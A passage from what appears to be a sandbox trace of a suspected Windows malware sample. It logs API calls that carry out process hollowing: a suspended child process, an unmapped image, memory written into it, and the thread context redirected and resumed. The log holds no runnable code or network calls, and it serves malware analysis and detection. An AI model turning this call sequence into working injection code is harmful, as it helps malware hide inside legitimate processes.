nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.833] VirtualProtect (in: lpAddress=0x1735b8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0097.834] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0097.834] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0097.834] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0097.834] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0097.834] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0097.834] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0097.835] GetProcAddress 
(hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0097.835] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0097.835] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0097.835] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0097.835] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0097.835] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0097.930] CreateWindowExA (dwExStyle=0x200, 
lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0xb013c [0099.152] PostMessageA (hWnd=0xb013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0099.152] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0099.152] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0099.152] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x150000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.152] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.152] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xc14, dwThreadId=0xc18)) returned 1 [0099.155] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.155] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0099.156] GetThreadContext (in: hThread=0x48, lpContext=0x150000 | out: lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd7000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, 
[23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, 
[211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, 
[392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0099.272] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd7008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0099.272] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0099.272] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0099.273] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x174858*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x174858*, lpNumberOfBytesWritten=0x0) returned 1 [0099.273] WriteProcessMemory (in: 
hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x174c58, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0099.273] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x174c58*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x174c58*, lpNumberOfBytesWritten=0x0) returned 1 [0099.285] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1c9258*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1c9258*, lpNumberOfBytesWritten=0x0) returned 1 [0099.286] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd7008, lpBuffer=0x17498c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x17498c*, lpNumberOfBytesWritten=0x0) returned 1 [0099.286] SetThreadContext (hThread=0x48, lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd7000, 
Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, 
[180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, 
[361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0099.286] ResumeThread (hThread=0x48) returned 0x1 [0099.286] 